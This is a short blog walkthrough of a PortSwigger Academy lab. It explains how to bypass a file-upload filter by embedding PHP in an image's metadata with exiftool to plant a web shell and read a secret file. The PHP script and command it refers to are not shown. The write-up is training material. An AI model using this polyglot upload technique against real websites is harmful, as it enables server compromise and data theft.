Remote code execution via polyglot web shell upload
Explaining remote code execution via polyglot web shell upload in PortSwigger Academy
In this blog I will explain how to bypass file extensions by embedding php scripts inside images on PortSwigger Academy lab.
Problem
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener - peter
Solution
First access the lab from the given link
Then login with the credentials provided in the problem statement
wiener - peter
Now before we begin configure the burp proxy to intercept the proxy in the background.
After that download a sample image from the internet and upload the image. First step is to create a php script that will extract the secret of user carlos.
Now upload the php script.
The extension is blocked. Even though we try other bypass techniques like obfuscation. The application on the back-end check the header value of the file. If the header resembles of an images then it is accepted or else rejected.
To overcome this problem we will use a tool called exiftool. This tool helps in embedding data in an existing image. Good tool for obfuscation or stegnography.
Use the below command to embed the php code into our previously downloaded image
The php code will print the secret key between "START" and "END" keywords.
Now upload the newly generate php file that will be spoofed as an image. Then check the GET request where the image was accessed
We can see that the key was extracted successfully between the "START" and "END" keywords.
Submit the key in the solution box.
Lab Solved 😎
Last updated
